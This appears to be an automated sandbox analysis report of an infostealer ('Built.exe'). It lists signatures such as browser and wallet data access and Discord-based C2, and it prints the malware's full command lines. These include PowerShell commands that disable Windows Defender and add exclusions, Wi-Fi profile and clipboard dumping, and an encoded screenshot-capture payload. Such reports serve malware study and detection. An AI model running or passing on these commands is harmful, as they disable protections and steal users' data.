| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI28442\rar.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMA